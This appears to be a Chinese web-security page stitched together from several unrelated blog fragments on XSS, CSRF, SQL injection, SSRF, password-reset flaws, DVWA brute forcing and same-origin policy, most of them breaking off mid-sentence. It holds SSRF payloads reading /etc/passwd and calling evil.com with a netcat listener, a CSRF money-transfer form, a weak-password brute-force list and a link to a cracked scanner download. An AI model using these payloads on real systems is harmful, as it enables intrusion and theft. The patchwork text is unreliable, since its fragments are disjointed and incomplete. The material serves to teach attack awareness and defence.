web安全

http://www.owasp.org.cn/ 这个会不定时的更新，而且里面说例子和原理都挺全面的， 大家可以去这里看到最新的威胁排行 OWASP： 开放式Web应用程序安全项目（OWASP）是一个非营利组织，不附属于任何企业或财团。因此，由OWASP提供和开发的所有设施和文件都不受商业因素的影响。OWASP支持商业安全技术的合理使用，它有一个论坛，在论坛里信息技术专业人员可以发表和传授专业知识和技能。 什么是漏洞？ 漏洞就是一个系统存在的弱点或者缺陷。 漏洞有可能是来自应用软件或者操作系统设计时的缺陷或者编码的时候产生的错误，也可能是来自于数据交互过程中设计的缺陷或者逻辑流程上的问题。这些漏洞有可能被有意或者无意的利用，从而造成一些意外的后果。比如信息泄露，资料被修改，系统被他人控制等等。 常见的一些漏洞 1.注入 其中最常见的就是SQL注入 SQL注入就是把一个SQL语句添加到用户输入的参数中，并且把这个参数发送到后台SQL服务器进行解析并执行。 2.XSS（跨站脚本攻击） 攻击者在网页中插入恶意代码，而网站对于用户输入内容未过滤，当用户浏览该页之时，页面中被插入的代码被执行，从而达到恶意攻击用户的特殊目的。 3.文件上传漏洞 文件上传漏洞是指用户上传一个可执行的脚本文件，并通过此脚本文件获得了执行服务端命令的能力，这种攻击方式也是最直接和有效的，有的时候几乎不需要技术门槛。

Web 安全的对于 Web 从业人员来说是一个非常重要的课题 , 所以在这里总结一下 Web 相关的安全攻防知识，希望以后不要再踩雷，也希望对看到这篇文章的同学有所帮助。今天这边文章主要的内容就是分析几种常见的攻击的类型以及防御的方法。 也许你对所有的安全问题都有一定的认识，但最主要的还是在编码设计的过程中时刻绷紧安全那根弦，需要反复推敲每个实现细节，安全无小事。 本文代码 Demo 都是基于 Node.js 讲解，其他服务端语言同样可以参考。 XSS 首先说下最常见的 XSS 漏洞，XSS (Cross Site Script)，跨站脚本攻击，因为缩写和 CSS (Cascading Style Sheets) 重叠，所以只能叫 XSS。 XSS 的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码，当用户浏览该页之时，嵌入其中 Web 里面的脚本代码会被执行，从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。XSS 的攻击方式千变万化，但还是可以大致细分为几种类型。 非持久型 XSS 非持久型 XSS 漏洞，也叫反射型 XSS 漏洞，一般是通过给别人发送带有恶意脚本代码参数的 URL，当 URL 地址被打开时，特有的恶意代码参数被 HTML 解析、执行。 20180113155741.jpg 一个例子，比如你的 Web 页面中包含有以下代码： <select

郑昀 创建于2014-01-12； 最后更新于2014-01-13. 找回密码功能是漏洞传统重灾区，下面列出两个经典错误点，请引以为戒吧Web开发工程师们！ Web安全： 一）以为用户不会抓包不会看源码不会分析表单参数，HTML文档和表单里想写啥就写啥 1）某手网： +手机App的忘记密码功能： 首先，通过抓包分析，发现密码重置接口可以Web访问；其次，填入手机号码提交， 服务器端的响应中居然包含 明文短信验证码 ，虽然是在JavaScript中的注释里； 补充案例：绝非个案。如第三方支付平台支付通也干过， http://www.wooyun.org/bugs/wooyun-2010-022378 ；走秀网干过， http://www.wooyun.org/bugs/wooyun-2012-05630 ； 2）PPS： +网页版忘记密码功能： 贴心地实现了“重新发送找回密码邮件”功能；但是，不幸地 在这个GET请求的URL里， 目标email参数是明文的 ；从而可以将任意用户的密码重置邮件发给指定邮箱； 3）新网互联： +网页版忘记密码功能： 页面虽然展示的是星号遮挡的邮箱地址，但 HTML文档构造的 表单参数里却使用 邮箱明文 ，最终导致土豆网域名被劫持； 4）搜狐： +网页版找回密码功能： 找回密码时要回答“密码提示问题”；但是工程师把 答案明文 写在 textarea

【渗透测试-web安全】DVWA-暴力破解 基本思路 配置实操 登录系统 设置安全级别 burpsuite暴力破解 抓包 设置暴破内容 导入字典 开始暴破 基本思路 暴力破解首先应该做的是： 构建弱口令 构建常见用户名 根据对应的破解场景构建特定的用户名密码组合 配置实操 登录系统 设置安全级别 尝试Low安全设置下的暴力破解 构建常见用户名、密码组合 常见用户名 常见密码 常见用户名 常见密码 admin password root root test test administrator administrator manage abc123 system 123456 test123 qwerty 根据列表我们得知一共能够组成的组合是 7 * 7 = 49 中可能性的排列组合 burpsuite暴力破解 抓包 设置暴破内容 注：这里的Attack type应该设置成Cluster bomb的格式 导入字典 开始暴破 根据对应的数据长度我们能够判断正确的用户名密码： 如图我们能够知道对应的用户名是：admin 密码是：password 不同等级的破解难度肯定有巨大的差别所以日常进行破解的过程中时间可能会很久。 而且还有可能碰到很多反暴力破解的，比如设置IP黑名单、设置错误登录次数、设置每次登录错误后延时1分钟才能再次登录、设置验证码等 来源： https://blog.csdn

Cross Site Request Forgery (CSRF) 跨站请求伪造. 攻击例子 考虑以下请求, 登陆后通过下面的请求进行转账操作. POST /transfer HTTP/1.1 Host: bank.example.com Cookie: JSESSIONID=randomid; Domain=bank.example.com; Secure; HttpOnly Content-Type: application/x-www-form-urlencoded amount=100.00&routingNumber=1234&account=9876 如果在没有退出登陆的情况下,登陆了另外一个网站,在网站中有如下一个按钮: <form action="https://bank.example.com/transfer" method="post"> <input type="hidden" name="amount" value="100.00"/> <input type="hidden" name="routingNumber" value="evilsRoutingNumber"/> <input type="hidden" name="account" value="evilsAccountNumber"/> <input type="submit" value

SQL: sql注入_百度百科 http://baike.baidu.com/view/3896.htm (包含注入方法) sql注入原理讲解 http://blog.csdn.net/stilling2006/article/details/8526458 sql注入攻击过程 http://blog.jobbole.com/83092/ SQL注入全过程实况转播 http://www.cnblogs.com/hkncd/archive/2012/03/31/2426274.html php sql注入 http://php.net/manual/zh/security.database.sql-injection.php 上传: 上传漏洞利用方法www.qxzxp.com/3761.html XSS netsecurity.51cto.com/art/201408/448305_all.htm www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html http://983836259.blog.51cto.com/7311475/1623146 一句话木马 www.arkteam.net/?p=48 来源： oschina 链接： https://my.oschina.net/u/2403163/blog/529621

无回显情况下通过VPS NC监听所有URL Schema存在情况，也可以用DNSlog来试探。 0x01 测试URL 当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的URL Schema： file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统中获取文件： http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器阻止对外部站点发送HTTP请求，或启用了白名单防护机制，只需使用如下所示的URL Schema就可以绕过这些限制： dict:// 这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表： http://example.com/ssrf.php?dict://evil.com:1337/ evil.com:$ nc -lvp 1337 Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 31126)CLIENT libcurl 7.40.0 sftp:// 在这里

1、AWVS 是国外一款不错的安全测试工具 ，界面清楚，使用方便。可以爬取网页加载payload测试存在的安全问题 破解版的下载地址： https://www.arvinhk.com/post/306.html 使用破解版的先卸载之前安装的AWVS 2、安装之后界面如下： 3、对某某靶机的安全检测 来源： https://www.cnblogs.com/xinxianquan/p/11582255.html

XSS的入门与介绍 跨站攻击 XSS全称跨站脚本（Cross Site Scripting），一种注入式攻击方式。 XSS成因 对于用户输入没有严格控制而直接输出到页面 对非预期输入的信任 XSS的危害 盗取各类用户账号，如机器登录账号，用户网银账号，各类管理员账号 窃取数据 非法转账 挂马 XSS 实例 XSS的分类 常规的XSS分类 存储型（持久型） 反射型（非持久型） DOM型 其实DOM型也属于反射型的一种，不过比较特殊，所以一般也当做单独类 这个是我对掘金进行的DOM型XSS操作的实例 其他XSS类别 mXSS (突变型XSS) UXSS（通用型XSS） FlashXSS UTF-7 XSS MHTMLXSS CSSXSS VBScript XSS XSS盲打平台与蠕虫 XSS盲打是指攻击者对数据提交后展现的后台未知情况下的一种XSS攻击方式。 XSS盲打平台就是为这种方式提供基本平台功能 XSS蠕虫 Samy蠕虫 2005年10月14日，蠕虫在世界最流行的社交网站MySpace.com上传播，更改 了超过 一百万个人用户个人资料页面。 XSS蠕虫的原理 利用XSS实现某些操作，比如微博关注用户 实现某些操作的同时，触发蠕虫代码复制和传播 推荐书籍《XSS蠕虫&病毒--即将发生的威胁与最好的防御》 本文看自Web安全之WXSS 入门与介绍视频 来源： https:/

最近项目涉及到安全方面，自己特意了解了一下，记录在此，共同学习。 常见的web安全有以下几个方面 同源策略（Same Origin Policy） 跨站脚本攻击XSS（Cross Site Scripting） 跨站请求伪造CSRF（Cross-site Request Forgery） 点击劫持（Click Jacking） SQL注入（SQL Injection） 同源策略 含义 所谓同源策略，指的是浏览器对不同源的脚本或者文本的访问方式进行的限制。比如源a的js不能读取或设置引入的源b的元素属性。 所谓"同源"指的是"三个相同" 协议相同 域名相同 端口相同 举例来说，http://www.example.com/dir/page.html 这个网址，协议是 http:// ，域名是 www.example.com ，端口是 80（默认端口可以省略）。它的同源情况如下 http://www.example.com/dir2/other.html：同源 http://example.com/dir/other.html：不同源（域名不同） http://v2.www.example.com/dir/other.html：不同源（域名不同） http://www.example.com:81/dir/other.html：不同源（端口不同） 目的 同源政策的目的